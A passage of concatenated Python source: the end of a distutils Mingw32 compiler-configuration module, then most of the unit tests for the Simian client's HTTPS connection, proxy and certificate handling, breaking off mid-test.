if self.gcc_version <= "2.91.57": entry_point = '--entry _DllMain@12' else: entry_point = '' self.set_executables(compiler='gcc -mno-cygwin -O -Wall', compiler_so='gcc -mno-cygwin -mdll -O -Wall', compiler_cxx='g++ -mno-cygwin -O -Wall', linker_exe='gcc -mno-cygwin', linker_so='%s -mno-cygwin %s %s' % (self.linker_dll, shared_option, entry_point)) # Maybe we should also append -mthreads, but then the finished # dlls need another dll (mingwm10.dll see Mingw32 docs) # (-mthreads: Support thread-safe exception handling on `Mingw32') # no additional libraries needed self.dll_libraries=[] # Include the appropriate MSVC runtime library if Python was built # with MSVC 7.0 or later. self.dll_libraries = get_msvcr() # __init__ () # class Mingw32CCompiler # Because these compilers aren't configured in Python's pyconfig.h file by # default, we should at least warn the user if he is using a unmodified # version. CONFIG_H_OK = "ok" CONFIG_H_NOTOK = "not ok" CONFIG_H_UNCERTAIN = "uncertain" def check_config_h(): """Check if the current Python installation (specifically, pyconfig.h) appears amenable to building extensions with GCC. Returns a tuple (status, details), where 'status' is one of the following constants: CONFIG_H_OK all is well, go ahead and compile CONFIG_H_NOTOK doesn't look good CONFIG_H_UNCERTAIN not sure -- unable to read pyconfig.h 'details' is a human-readable string explaining the situation. Note there are two ways to conclude "OK": either 'sys.version' contains the string "GCC" (implying that this Python was built with GCC), or the installed "pyconfig.h" contains the string "__GNUC__". """ # XXX since this function also checks sys.version, it's not strictly a # "pyconfig.h" check -- should probably be renamed... from distutils import sysconfig import string # if sys.version contains GCC then python was compiled with # GCC, and the pyconfig.h file should be OK if string.find(sys.version,"GCC") >= 0: return (CONFIG_H_OK, "sys.version mentions 'GCC'") fn = sysconfig.get_config_h_filename() try: # It would probably better to read single lines to search. # But we do this only once, and it is fast enough f = open(fn) s = f.read() f.close() except IOError, exc: # if we can't read this file, we cannot say it is wrong # the compiler will complain later about this file as missing return (CONFIG_H_UNCERTAIN, "couldn't read '%s': %s" % (fn, exc.strerror)) else: # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar if string.find(s,"__GNUC__") >= 0: return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn) else: return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn) def get_versions(): """ Try to find out the versions of gcc, ld and dllwrap. If not possible it returns None for it. 
""" from distutils.version import LooseVersion from distutils.spawn import find_executable import re gcc_exe = find_executable('gcc') if gcc_exe: out = os.popen(gcc_exe + ' -dumpversion','r') out_string = out.read() out.close() result = re.search('(\d+\.\d+(\.\d+)*)',out_string) if result: gcc_version = LooseVersion(result.group(1)) else: gcc_version = None else: gcc_version = None ld_exe = find_executable('ld') if ld_exe: out = os.popen(ld_exe + ' -v','r') out_string = out.read() out.close() result = re.search('(\d+\.\d+(\.\d+)*)',out_string) if result: ld_version = LooseVersion(result.group(1)) else: ld_version = None else: ld_version = None dllwrap_exe = find_executable('dllwrap') if dllwrap_exe: out = os.popen(dllwrap_exe + ' --version','r') out_string = out.read() out.close() result = re.search(' (\d+\.\d+(\.\d+)*)',out_string) if result: dllwrap_version = LooseVersion(result.group(1)) else: dllwrap_version = None else: dllwrap_version = None return (gcc_version, ld_version, dllwrap_version)
apache-2.0
googlearchive/simian
src/tests/simian/client/client_test.py
1
41740
#!/usr/bin/env python # # Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """client module tests.""" import httplib import logging import sys from pyfakefs import fake_filesystem import M2Crypto import mock import stubout from google.apputils import app from google.apputils import basetest from simian import auth from simian.client import client class ClientModuleTest(basetest.TestCase): """Test the client module.""" def testConstants(self): for a in [ 'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN', 'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'DEBUG', 'URL_UPLOADPKG']: self.assertTrue(hasattr(client, a)) class MultiBodyConnectionTest(basetest.TestCase): """Test MultiBodyConnection class.""" def setUp(self): super(MultiBodyConnectionTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.mbc = client.MultiBodyConnection() def tearDown(self): super(MultiBodyConnectionTest, self).tearDown() self.stubs.UnsetAll() def testSetProgressCallback(self): """Test SetProgressCallback().""" fn = lambda x: 1 self.assertFalse(hasattr(self.mbc, '_progress_callback')) self.mbc.SetProgressCallback(fn) self.assertEqual(self.mbc._progress_callback, fn) self.assertRaises( client.Error, self.mbc.SetProgressCallback, 1) def testProgressCallback(self): """Test _ProgressCallback().""" self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback = mock.Mock() self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback.assert_called_with(1, 2) @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequest(self, mock_request): """Test request().""" fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(fs) fake_open = fake_filesystem.FakeFileOpen(fs) file_name = '/f1' file_size = 10000 f_body = 'x' * file_size fs.CreateFile(file_name, contents=f_body) fake_file = fake_open(file_name, 'r') self.stubs.Set(client, 'os', fake_os) method = 'GET' url = '/foo' body = ['hello', fake_file] content_length = len(body[0]) + file_size headers = { 'Content-Length': content_length, } self.mbc._is_https = False self.mbc.send = mock.Mock() self.mbc._ProgressCallback = mock.Mock() inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_request, 'request') inorder_calls.attach_mock(self.mbc.send, 'send') inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback') self.mbc.request(method, url, body=body) inorder_calls.assert_has_calls([ mock.call.request(self.mbc, method, url, headers=headers), mock.call._ProgressCallback(0, content_length), mock.call.send(body[0]), mock.call._ProgressCallback(len(body[0]), content_length), mock.call.send(f_body[:8192]), mock.call._ProgressCallback(len(body[0]) + 8192, content_length), mock.call.send(f_body[8192:]), mock.call._ProgressCallback(len(body[0]) + file_size, content_length), mock.call._ProgressCallback(len(body[0]) + file_size, content_length)]) class HTTPSMultiBodyConnectionTest(basetest.TestCase): def setUp(self): self.stubs = stubout.StubOutForTesting() self.hostname = 'foohost' 
self.mbc = client.HTTPSMultiBodyConnection(self.hostname) def tearDown(self): self.stubs.UnsetAll() def testParentClassRequestAssumption(self): """Test assumptions of parent class request().""" method = 'GET' url = '/foo' body = None headers = {} with mock.patch.object( client.httplib.HTTPConnection, '_send_request', return_value=-1) as mock_fn: c = client.httplib.HTTPConnection(self.hostname) self.assertEqual(None, c.request(method, url)) mock_fn.assert_called_once_with(method, url, body, headers) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumptionEmptyBody( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body1 = None headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a None body supplied, send() is never called. on >=2.7 # endheaders is still called with the body contents, even if they # are None. c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body1, headers) expected = [ mock.call.putrequest(method, url), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body1)) else: expected.append(mock.call.endheaders()) inorder_calls.assert_has_calls(expected) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumption( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body2 = 'howdy' headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a body supplied, send() is called inside _send_request() on # httplib < 2.6. in >=2.7 endheaders() sends the body and headers # all at once. 
expected = [ mock.call.putrequest(method, url), mock.call.putheader('Content-Length', str(len(body2))), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body2)) else: expected.append(mock.call.endheaders()) expected.append(mock.send(body2)) c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body2, headers) inorder_calls.assert_has_calls(expected) def testDirectSendTypes(self): """Test the DIRECT_SEND_TYPES constant for sane values.""" self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestSimple(self, mock_send, mock_request): """Test request with one body element.""" method = 'GET' url = '/foo' body = 'hello' headers = { 'Content-Length': len(body), 'Host': self.hostname, } self.mbc.request(method, url, body=body) mock_request.assert_called_once_with( self.mbc, method, url, headers=headers) mock_send.assert_called_once_with(body) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestMultiString(self, send_mock, request_mock): """Test request() with multiple body string elements.""" method = 'GET' url = '/foo' body = ['hello', 'there'] headers = { 'Content-Length': sum(map(len, body)), 'Host': self.hostname, } for s in body: client.httplib.HTTPConnection.send(s).AndReturn(None) self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) send_mock.assert_has_calls([mock.call(x) for x in body]) @mock.patch.object(client.httplib.HTTPConnection, 'send') @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequestMultiMixed(self, request_mock, send_mock): """Test request() with multiple mixed body elements.""" filepath = '/somefilename' f_body = 'there' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(filepath, contents=f_body) fake_open = fake_filesystem.FakeFileOpen(fs) f = fake_open(filepath) method = 'GET' url = '/foo' body = ['hello', f] content_length = len(body[0]) + len(f_body) headers = { 'Content-Length': content_length, 'Host': self.hostname, } self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) self.assertEqual(2, send_mock.call_count) send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)]) def testSetCACertChain(self): """Test SetCACertChain().""" self.mbc.SetCACertChain('foo') self.assertEqual(self.mbc._ca_cert_chain, 'foo') def testIsValidCert(self): """Test _IsValidCert().""" self.assertEqual(1, self.mbc._IsValidCert(1, 1)) def testIsValidCertOkZero(self): """Test _IsValidCert().""" cert = mock.create_autospec(M2Crypto.X509.X509) cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name) store = mock.create_autospec(M2Crypto.X509.X509_Store_Context) store.get_current_cert.return_value = cert cert.get_subject.return_value = cert_subject cert_subject.__str__.return_value = 'valid' self.assertEqual(0, self.mbc._IsValidCert(0, store)) cert_subject.__str__.assert_called() @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChain(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = 
fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf ctx = mock.create_autospec(M2Crypto.SSL.Context) ctx.load_verify_locations.return_value = 1 cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain self.mbc._LoadCACertChain(ctx) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) # mock 2.0.0 incorrectly binds spec to calls ctx._spec_signature = None ctx.assert_has_calls([ mock.call.load_verify_locations(cafile=tf.name), mock.call.set_verify( client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert, depth=9, callback=self.mbc._IsValidCert)]) @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain ctx = mock.create_autospec(M2Crypto.SSL.Context) self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, ctx) ctx.load_verify_locations.assert_called_once_with(cafile=tf.name) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) def testLoadCACertChainWhenNone(self): """Test _LoadCACertChain().""" self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock()) @mock.patch.object(client.SSL, 'Context', autospec=True) @mock.patch.object(client.SSL, 'Connection', autospec=True) def testConnect(self, connection_mock, context_mock): """Test connect().""" context = context_mock() conn = connection_mock(context) connection_mock.reset_mock() context_mock.reset_mock() self.mbc._ca_cert_chain = 'cert chain foo' context_mock.return_value = context connection_mock.return_value = conn with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock: self.mbc.connect() self.assertEqual(self.mbc.sock, conn) load_ca_chain_mock.assert_called_once_with(context) context_mock.assert_called_once_with(client._SSL_VERSION) connection_mock.assert_called_once_with(context) conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port)) if client._CIPHER_LIST: context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)]) def testConnectWhenNoCACertChain(self): """Test connect().""" context = mock.create_autospec(M2Crypto.SSL.Context) with mock.patch.object(client.SSL, 'Context', return_value=context): self.assertRaises(client.SimianClientError, self.mbc.connect) if client._CIPHER_LIST: context.assert_has_calls( [mock.call.set_cipher_list(client._CIPHER_LIST)]) class HttpsClientTest(basetest.TestCase): """Test HttpsClient class.""" def setUp(self): super(HttpsClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsClient(self.hostname) def tearDown(self): super(HttpsClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsClient, '_LoadHost') def testInit(self, mock_lh): """Test __init__().""" i = client.HttpsClient(self.hostname) self.assertEqual(i._progress_callback, None) self.assertEqual(i._ca_cert_chain, None) mock_lh.assert_called_once_with(self.hostname, None, None) def testLoadHost(self): """Test _LoadHost().""" self.client._LoadHost('host') self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, None) 
self.assertTrue(self.client.use_https) self.client._LoadHost('host', 12345) self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, 12345) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321') self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321', 9999) self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('foo.bar:5555') self.assertEqual(self.client.hostname, 'foo.bar') self.assertEqual(self.client.port, 5555) self.assertTrue(self.client.use_https) self.client._LoadHost('http://nonsecurehost') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('http://nonsecurehost:1234') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, 1234) self.assertFalse(self.client.use_https) self.client._LoadHost(u'http://unicodehost') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilproxy') self.assertEqual(self.client.proxy_port, 9) self.assertFalse(self.client.proxy_use_https) self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilprxssl') self.assertEqual(self.client.proxy_port, 8) self.assertTrue(self.client.proxy_use_https) def testSetCACertChain(self): """Test SetCACertChain().""" self.client.SetCACertChain('foo') self.assertEqual(self.client._ca_cert_chain, 'foo') def _TestConnect(self, test_client, hostname, port): """Test _Connect().""" m = mock.Mock() m.return_value = m test_client._ca_cert_chain = 'cert chain' use_https = ( (not test_client.proxy_hostname and test_client.use_https) or (test_client.proxy_hostname and test_client.proxy_use_https)) if use_https: self.stubs.Set(client, 'HTTPSMultiBodyConnection', m) else: self.stubs.Set(client, 'HTTPMultiBodyConnection', m) expected = [mock.call(hostname, port)] if use_https: expected.append(mock.call.SetCACertChain('cert chain')) expected.append(mock.call.connect()) test_client._Connect() m.assert_has_calls(expected) def testConnect(self): self._TestConnect(self.client, self.hostname, self.port) def testConnectWithProxy(self): test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123') self._TestConnect(test_client, 'proxyhost', 123) def testGetResponseNoFile(self): """Test _GetResponse() storing body 
directly into response obj.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'OK' conn = mock.create_autospec(httplib.HTTPConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, body) self.assertEqual(r.body_len, body_len) def testGetResponseOutputFile(self): """Test _GetResponse() sending the body to output_file.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) path = '/file' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(path) fake_open = fake_filesystem.FakeFileOpen(fs) output_file = fake_open(path, 'w') response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'Ok' conn = mock.create_autospec(httplib.HTTPSConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn, output_file=output_file) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, None) self.assertEqual(r.body_len, body_len) output_file.close() self.assertEqual(body, fake_open(path).read()) def testRequest(self): """Test _Request().""" method = 'zGET' url = u'/url' body1 = {'encodeme': 1} body1_encoded = client.urllib.urlencode(body1) body2 = 'leave this alone' headers = {'User-Agent': 'gzip'} conn = mock.create_autospec(httplib.HTTPConnection) self.client._Request(method, conn, url, body1, headers) self.client._Request(method, conn, url, body2, headers) conn.request.assert_has_calls([ mock.call(method, str(url), body=body1_encoded, headers=headers), mock.call(method, str(url), body=body2, headers=headers)]) def _TestDoRequestResponse(self, test_client, url, req_url): """Test _DoRequestResponse().""" method = 'zomg' conn = mock.create_autospec(httplib.HTTPConnection) body = 'body' headers = 'headers' output_file = None response = mock.create_autospec(httplib.HTTPResponse) response.status = 200 proxy_use_https = test_client.proxy_use_https with mock.patch.object(test_client, '_Connect', return_value=conn): request_mock = mock.create_autospec(test_client._Request) self.stubs.Set(test_client, '_Request', request_mock) get_response_mock = mock.Mock(return_value=response) self.stubs.Set(test_client, '_GetResponse', get_response_mock) self.assertEqual( response, test_client._DoRequestResponse( method, url, body, headers, output_file)) request_mock.assert_called_once_with( method, conn, req_url, body=body, headers=headers) get_response_mock.assert_called_once_with(conn, output_file=output_file) conn.assert_not_called() response.assert_not_called() with mock.patch.object( test_client, '_Connect', side_effect=client.httplib.HTTPException): self.assertRaises( client.HTTPError, test_client._DoRequestResponse, method, url, body, headers, output_file) def testDoRequestResponse(self): self._TestDoRequestResponse(self.client, '/url', '/url') def testDoHttpRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='proxyhost:123') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpProxy(self): """Test a https 
request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='http://proxyhost:124') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='https://proxyhost:125') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='https://proxyhost:126') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoWithInvalidMethod(self): """Test Do() with invalid method.""" self.assertRaises( NotImplementedError, self.client.Do, 'badmethod', '/url') @mock.patch.object(client.time, 'sleep') def testDo(self, mock_sleep): """Test Do() with correct arguments and no output_filename.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None # HTTP 500 should retry. mock_response_fail = mock.create_autospec(httplib.HTTPResponse) mock_response_fail.status = 500 # HTTP 200 should succeed. mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=[ mock_response_fail, mock_response]) as mock_do_request_response: inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') do_request_response_call = mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file) self.client.Do(method, url, body, headers, output_filename) inorder_calls.assert_has_calls([ mock.call.sleep(0), do_request_response_call, mock.call.sleep(5), do_request_response_call]) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttp500(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.client.Do(method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttpError(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry, but ending with HTTPError.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=client.HTTPError) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.assertRaises( client.HTTPError, 
self.client.Do, method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) def testDoWithOutputFilename(self): """Test Do() where an output_filename is supplied.""" method = 'GET' url = 'url' body = None headers = {} output_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=output_file) output_filename = '/tmpfile' mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: self.client.Do( method, url, body, headers, output_filename, _open=mock_open) mock_do_request_response.assert_called_once_with( method, url, body=body, headers={}, output_file=output_file) def testDoWithProxy(self): """Test Do() with a proxy specified.""" method = 'GET' url = 'url' proxy = 'proxyhost:123' # Working case. mock_response = mock.create_autospec(httplib.HTTPConnection) mock_response.status = 200 test_client = client.HttpsClient(self.hostname, proxy=proxy) with mock.patch.object( test_client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: test_client.Do(method, url) mock_do_request_response.assert_called_once_with( method, url, body=None, headers={}, output_file=None) # No port case. proxy = 'proxyhost' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) # Bad port case. proxy = 'proxyhost:alpha' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) class HttpsAuthClientTest(basetest.TestCase): """Test HttpsAuthClient.""" def setUp(self): super(HttpsAuthClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsAuthClient(self.hostname) self.fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(self.fs) self.fake_open = fake_filesystem.FakeFileOpen(self.fs) self.stubs.Set(client, 'os', fake_os) def tearDown(self): super(HttpsAuthClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain') def testInit(self, _): """Test __init__().""" c = client.HttpsAuthClient(self.hostname) self.assertEqual(c._auth1, None) self.assertEqual(c._cookie_token, None) def testPlatformSetup(self): """Test PlatformSetup().""" with mock.patch.object(client.platform, 'system', return_value='Darwin'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH) with mock.patch.object(client.platform, 'system', return_value='other'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH) def testGetFacter(self): """Test GetFacter().""" st_dt = client.datetime.datetime.now() facter = {'foo': 'bar', 'one': '1'} file_path = '/x' lines = [ 'foo => bar', 'one => 1', 'I_am_invalid', ] fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines)) fake_file.st_uid = 0 fake_file.st_mtime = int(st_dt.strftime('%s')) self.client.facter_cache_path = file_path with mock.patch.object(client.os, 'geteuid', return_value=0): self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open)) def testGetFacterWhenInsecureFileForRoot(self): """Test 
GetFacter().""" file_path = '/x' self.client.facter_cache_path = file_path fake_file = self.fs.CreateFile(file_path) fake_file.st_uid = 100 # root with mock.patch.object(client.os, 'geteuid', return_value=0): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() # same regular user with mock.patch.object(client.os, 'geteuid', return_value=200): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() @mock.patch.object(client.os.path, 'isfile', return_value=False) def testGetFacterWhenCacheDoesNotExist(self, _): """Test GetFacter() with a nonexistent cache file.""" self.client.facter_cache_path = '/x' self.assertEqual({}, self.client.GetFacter()) def testGetFacterWhenCachePathIsNone(self): """Test GetFacter() with facter_cache_path is None.""" self.client.facter_cache_path = None self.assertEqual({}, self.client.GetFacter()) def testGetAuthTokenFromHeadersSuccess(self): token = '%s=123; secure; httponly;' % auth.AUTH_TOKEN_COOKIE result = self.client._GetAuthTokenFromHeaders( {'set-cookie': 'other=value;,%s,something=else;' % token}) self.assertEqual(token, result) def testGetAuthTokenFromHeadersMissingHeader(self): self.assertRaises( client.SimianClientError, self.client._GetAuthTokenFromHeaders, {'set-cookie': ''}) class SimianClientTest(basetest.TestCase): """Test SimianClient class.""" def setUp(self): self.hostname = 'hostname' self.port = None self.client = client.SimianClient(self.hostname) def testInitWithoutHostname(self): """Test __init__() without a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient() self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME) self.assertEqual(clienttmp._user, user) def testInitWithHostname(self): """Test __init__() with a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient('foo') self.assertEqual(clienttmp.hostname, 'foo') self.assertEqual(clienttmp._user, user) def testInitAsRoot(self): """Test __init__() with a hostname passed.""" with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value='root'): self.assertRaises(client.SimianClientError, client.SimianClient) def testIsDefaultHostClient(self): """Test IsDefaultHostClient().""" self.client._default_hostname = 'foo' self.assertEqual(self.client.IsDefaultHostClient(), 'foo') def testSimianRequest(self): """Test _SimianRequest().""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None good_response = client.Response(status=200, body='hello there') with mock.patch.object( self.client, 'Do', return_value=good_response) as do_mock: self.assertEqual( good_response.body, self.client._SimianRequest(method, url, headers=headers)) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def testSimianRequestWithError(self): """Test _SimianRequest() with an error status returned.""" 